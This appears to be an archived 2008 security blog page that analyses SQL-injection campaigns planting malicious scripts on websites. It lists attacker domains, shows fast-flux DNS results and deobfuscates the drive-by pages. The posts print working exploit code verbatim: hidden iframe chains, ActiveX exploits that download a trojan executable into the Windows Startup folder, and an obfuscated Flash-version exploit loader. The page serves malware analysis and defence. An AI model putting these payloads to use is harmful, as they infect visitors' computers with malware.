jj.js essentially calls iframe ‘http://www.worldofwarcrokft.com/1/index.htm’
index.htm is 8-bit ASCII encoded. The hexdump content as follows:
Read more »
Archive for July, 2008
www.worldofwarcrokft.com/jj.js
Posted in sql injection on July 31, 2008 by s3cu*/js.js and */jj.js
Posted in sql injection on July 31, 2008 by s3cuThe old wave of attacks seems to have died down?
Have attacks using these */js.js and */jj.js malicious scripts taken over?
- www.iroe.ru/js.js
- www.bnsr.ru/js.js
- www.njep.ru/js.js
- www.ch35.ru/js.js
- www.jve4.ru/js.js
- www.worldofwarcrokft.com/jj.js
analysis of www.h23f.ru/ngg.js
Posted in sql injection on July 26, 2008 by s3cuhis injected domain calls iframe src from http://iroe.ru/cgi-bin/index.cgi?ad
www.o1o2qq.cn/ri.js
Posted in sql injection on July 22, 2008 by s3cuanother injected script src.
The script redirects to direct URL depending on whether your browser is set to chinese language.
Content as follows: Read more »
www.liwejr.cn/c4.htm?b029
Posted in sql injection on July 22, 2008 by s3cuthis injected iframe src, calls go.html
go.html calls exploits from user1.date-21.net
contents of go.html as follows Read more »
*/ngg.js (update 2)
Posted in sql injection on July 18, 2008 by s3cuMore *.ru domains
- www.iogp.ru/ngg.js
- www.nudk.ru/ngg.js
- www.sdkj.ru/ngg.js
Surfing to the main page of say www.nudk.ru, the website of Cash-Transfers Inc. appears.
Compare “dig www.iogp.ru” and “www.cashtransfers.tk”
;; ANSWER SECTION:
www.iogp.ru. 200 IN A 76.73.139.26
www.iogp.ru. 200 IN A 81.109.236.138
www.iogp.ru. 200 IN A 98.14.3.126
www.iogp.ru. 200 IN A 71.62.120.230
www.iogp.ru. 200 IN A 76.30.118.52
www.iogp.ru. 200 IN A 24.20.116.38
www.iogp.ru. 200 IN A 74.128.165.226
www.iogp.ru. 200 IN A 76.118.74.21
www.iogp.ru. 200 IN A 24.86.16.225
www.iogp.ru. 200 IN A 65.96.41.17
www.iogp.ru. 200 IN A 70.79.211.89
www.iogp.ru. 200 IN A 76.199.17.243
www.iogp.ru. 200 IN A 123.195.179.249
www.iogp.ru. 200 IN A 194.44.214.81
www.iogp.ru. 200 IN A 71.228.191.159;
; ANSWER SECTION:
www.cashtransfers.tk. 600 IN A 194.44.214.81
www.cashtransfers.tk. 600 IN A 76.30.118.52
www.cashtransfers.tk. 600 IN A 71.228.191.159
www.cashtransfers.tk. 600 IN A 65.96.41.17
www.cashtransfers.tk. 600 IN A 81.109.236.138
www.cashtransfers.tk. 600 IN A 76.199.17.243
www.cashtransfers.tk. 600 IN A 89.139.15.213
www.cashtransfers.tk. 600 IN A 74.128.165.226
www.cashtransfers.tk. 600 IN A 76.73.139.26
www.cashtransfers.tk. 600 IN A 76.118.74.21
www.cashtransfers.tk. 600 IN A 71.62.120.230
www.cashtransfers.tk. 600 IN A 70.79.211.89
www.cashtransfers.tk. 600 IN A 24.20.116.38
www.cashtransfers.tk. 600 IN A 79.87.139.200
www.cashtransfers.tk. 600 IN A 98.14.3.126
What is Cash Transfer Inc. ? Maybe this spam mail can give some clue…
www.eoai114.cn and user1.jzm010.cn
Posted in Uncategorized on July 17, 2008 by s3cumalicious content here…
Content of index.html
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://user1.jzm010.cn/ilink.html width=100 height=0
></iframe>");
}
else{document.write("<Iframe src=http://user1.jzm010.cn/flink.html width=100 hei
ght=0></iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.dxp008.cn\/b2.htm width=50 height=0><
\/iframe>")
Content of aa2.htm?20
<Iframe src="http://user1.jzm010.cn/14.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/ac.htm" width=100 height=0></iframe>
<script>
var kaspersky="woyaofa"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTStri
ng"]()
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/newlz.htm"></iframe>
');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real11.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real10.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1"))window["document"]["wr
ite"]('<iframe style=display:none src="http://user1.jzm010.cn/lz.htm"></iframe>'
);}catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/
1812235.js"></script>
Let’s follow one of the link user1.jzm010.cn/ac.htm
<html><object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="obj"></object>
<script language="javascript">
var buf1 = "http://dddd.nihao69.cn/down/ko.exe";
var buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/qq.exe";
obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();
</script></html>
<Iframe src="http://user1.jzm010.cn/ce.htm" width=100 height=0></iframe>
what’s this? It’s exploiting MS Snapshot Viewer ActiveX control to download trojan.
Let’s follow another link user1.jzm010.cn/ce.htm
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2900.3354" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1="http://dddd.nihao69.cn/down/ko.exe";
install["DownloadAndInstall"](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>
what’s is this clsid? could be another new exploit…
*/ngg.js (update 1)
Posted in sql injection on July 17, 2008 by s3cu.ru domains have started to be used in the injected domains
Examples:
- www.grtsel.ru/ngg.js
- www.korfd.ru/ngg.js
- www.btoperc.ru/ngg.js
- www.brcporb.ru/ngg.js
another interesting TLD is .eu domain used
Example:
- www.cdport.eu/ngg.js
www.maigol.cn/index.htm
Posted in sql injection on July 6, 2008 by s3cuThis is a partial analysis of the malicious site.
Content of index.htm
<script>
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=re10.htm></iframe>");
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
try{var f;
var gw=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var ww=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6C\x2E\x49\x45\x52\x50\x43\x74\x6C\x2E\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=re11.htm></iframe>");}}
</script>
at first glance, we can deduce it tries to exploit plugins such as real, swf and others.
flash.htm calls ilink.html and flink.html
Content of flink.html
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);
k=[function(e){return d[e]}];
e=function(){return'\\w+'};c=1};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}('6 4=A.z.y();3(4[\'x\']==9){h.g(\'j\').i=""; 3(4[\'5\']==w)
{6 2=f e("./v.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==u){6 2=f e("./t.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==s){6 2=f e("./r.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==q){6 2=f e("./p.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==o){6 2=f e("./n.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==m){6 2=f e("./l.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']>=k){3(h.g){h.g(\'j\').i=""}}}',37,37,'||so|if|version|rev|var|else|flashcontent||
write|000000|mymovie|swf|SWFObject|new|getElementById|document|
innerHTML|flashversion|124|f16|16|f28|28|f45|45|f47|47|f64|64|f115|115|
major|getPlayerVersion|SWFObjectUtil|deconcept'.split('|'),0,{}));
document.write("")</script>
It is interesting to note that a tool like swfobject (v1.5.1)is used. The obfuscated function essentially uses the swfobject code to check the flash player version to get the respective exploit, code as follows:
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']>=124){if(document.getElementById)
{document.getElementById('flashversion').innerHTML=""}}}
*/ri.js
Posted in sql injection on July 5, 2008 by s3cuThose sql injected domains ending with /ri.js
Examples:
- www.qq117cc.cn/ri.js which previously reported used k.js
- www.loveqianlai.cn/ri.js
- www.maigol.cn/ri.js
- www.qqcc123.cn/ri.js
- www.hiwowpp.cn/ri.js
some of the above JS points to www.bdsae.org.cn/bdsae/aa.htm?11
which contains some interesting new scripts.
